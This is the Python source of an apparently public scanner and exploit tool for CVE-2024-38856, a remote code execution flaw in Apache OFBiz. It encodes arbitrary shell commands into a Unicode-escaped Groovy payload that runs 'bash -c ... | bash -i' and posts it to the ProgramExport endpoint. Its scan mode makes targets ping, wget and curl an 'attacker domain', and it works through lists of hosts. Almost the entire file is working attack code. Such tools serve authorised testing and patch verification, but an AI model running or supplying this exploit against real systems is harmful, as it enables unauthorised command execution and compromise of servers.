import sys import base64 import requests import argparse import urllib3 from colorama import Fore, Style, init init(autoreset=True) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def getLogo(): logo = f""" {Fore.CYAN}██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ █████╗ █████╗ ███████╗ ██████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ╚════██╗██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗█████╔╝╚█████╔╝╚█████╔╝███████╗███████╗ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚═══██╗██╔══██╗██╔══██╗╚════██║██╔═══██╗ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ██████╔╝╚█████╔╝╚█████╔╝███████║╚██████╔╝ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚════╝ ╚════╝ ╚══════╝ ╚═════╝ {Fore.RED}Github: https://github.com/securelayer7/CVE-2024-38856_Scanner{Style.RESET_ALL} {Fore.RED}By: Securelayer7(yosef0x01 & Zeyad Azima){Style.RESET_ALL} """ print(logo) def commandEncoder(command): command_with_markers = f'echo [result]; {command}; echo [result];' encodedCommand = base64.b64encode(command_with_markers.encode()).decode() return encodedCommand def payloadUnicode(base64EncodedCommand): command = f'throw new Exception(["bash", "-c", "{{echo,{base64EncodedCommand}}}|{{base64,-d}}|{{bash,-i}}"].execute().text);' unicodePayload = ''.join(f'\\u{ord(c):04x}' for c in command) return unicodePayload def extract_output(response_text): start_marker = '[result]' end_marker = '[result]' start_index = response_text.find(start_marker) end_index = response_text.find(end_marker, start_index + len(start_marker)) if start_index != -1 and end_index != -1: output = response_text[start_index + len(start_marker):end_index].strip() return output return None def exploit(target, port, payload, timeout, proxies=None): url = f'{target}:{port}/webtools/control/main/ProgramExport' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } data = f"groovyProgram={payload}" try: response = requests.post(url, headers=headers, data=data, verify=False, timeout=timeout, proxies=proxies) return response.status_code, response.text except requests.exceptions.Timeout: print(f"{Fore.YELLOW}[!] Request timed out for {target}:{port}{Style.RESET_ALL}") return "timeout", "" except requests.exceptions.RequestException as e: print(f"{Fore.RED}Exception: {e}{Style.RESET_ALL}") return "target maybe down", "" def scan_vulnerability(target, port, domain, timeout, proxies=None): scanCommands = [ f'ping -c 4 {domain}', f'wget -O- {domain}', f'curl {domain}' ] results = [] url = f'{target}:{port}/webtools/control/main/ProgramExport' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } for command in scanCommands: encodedCommand = commandEncoder(command) unicodePayload = payloadUnicode(encodedCommand) data = f"groovyProgram={unicodePayload}" try: response = requests.post(url, headers=headers, data=data, verify=False, timeout=timeout, proxies=proxies) results.append((command, response.status_code)) except requests.exceptions.Timeout: results.append((command, "timeout")) except requests.exceptions.RequestException as e: results.append((command, f"Exception: {e}")) return results def processTarget(target, port, command, timeout, output_file=None, proxies=None, exploit_command=False, domain=None): if not exploit_command: scan_results = scan_vulnerability(target, port, domain, timeout, proxies) vulnerable = False for command, status in scan_results: if status == "timeout": print(f"{Fore.YELLOW}[+] Scan Payload: {command} - Request timed out{Style.RESET_ALL}") else: print(f"{Fore.CYAN}[+] Scan Payload:{Style.RESET_ALL} {command} {Fore.CYAN}- Status Code:{Style.RESET_ALL} {status}") if status == 200: vulnerable = True if vulnerable: result = f"{Fore.GREEN}[!] Target {target}:{port} is vulnerable.{Style.RESET_ALL}\n\n" else: result = f"{Fore.RED}[!] Target {target}:{port} is not vulnerable.{Style.RESET_ALL}\n\n" save_output(result, output_file) return encodedCommand = commandEncoder(command) unicodePayload = payloadUnicode(encodedCommand) statusCode, responseText = exploit(target, port, unicodePayload, timeout, proxies) output = extract_output(responseText) if output: result = f"{Fore.GREEN}[!] Exploit output:\n\t[+] Target: {target}, Port: {port}\n\t[+] Status Code: {statusCode}\n\t[+] Output: {command} \n\r\n{Style.RESET_ALL}{output} \n\n" else: result = f"{Fore.YELLOW}[!] Exploit executed, but no output found in the response :\n\t[+] Target: {target}, Port: {port}\n\t[+] Status Code: {statusCode}{Style.RESET_ALL}\n\n" save_output(result, output_file) def save_output(output, output_file=None): if output_file: with open(output_file, 'a') as f: f.write(output + '\n') else: print(output) def main(): parser = argparse.ArgumentParser(description='CVE-2024-38856 Apache Ofbiz RCE Scanner Framework.') parser.add_argument('-t', '--target', type=str, help='Target host') parser.add_argument('-p', '--port', type=int, help='Target port') parser.add_argument('-c', '--command', type=str, help='Command to execute (if exploit is performed)') parser.add_argument('-s', '--scan', action='store_true', help='Perform a scan to check for vulnerability') parser.add_argument('-d', '--domain', type=str, help='Domain (attacker domain) to scan with ping, curl, and wget') parser.add_argument('-f', '--file', type=str, help='File containing a list of targets in the format http(s)://target:port') parser.add_argument('-O', '--output', type=str, help='Output file to save results') parser.add_argument('--proxy', type=str, help='Proxy URL (e.g., http://localhost:8080)') parser.add_argument('--exploit', action='store_true', help='Exploit the vulnerability after scanning') parser.add_argument('--timeout', type=int, default=10, help='Request timeout in seconds (default: 10)') if len(sys.argv) == 1: parser.print_help() sys.exit(1) args = parser.parse_args() proxies = None if args.proxy: proxies = { "http": args.proxy, "https": args.proxy, } getLogo() print(f"{Fore.BLUE}[*] Options Passed:{Style.RESET_ALL}") for arg in vars(args): print(f" {Fore.GREEN}{arg}: {getattr(args, arg)}{Style.RESET_ALL}") targets = [] if args.file: with open(args.file, 'r') as f: targets = [line.strip() for line in f if line.strip()] if args.target: targets.append(f"{args.target}:{args.port or 8443}") if not targets: print(f"{Fore.RED}[!] No targets specified. Please provide a target or a file with targets.{Style.RESET_ALL}") sys.exit(1) for target in targets: if args.scan and not args.domain: print(f"{Fore.RED}[!] The --domain option is required when using --scan.{Style.RESET_ALL}") sys.exit(1) if '://' in target: url_parts = target.split(':') target_host = url_parts[0] + ':' + url_parts[1] port = url_parts[2] if len(url_parts) > 2 else '8443' else: target_host = target.split(':')[0] port = target.split(':')[1] if ':' in target else '8443' processTarget(target_host, port, args.command, args.timeout, args.output, proxies, args.exploit, args.domain) if __name__ == "__main__": main()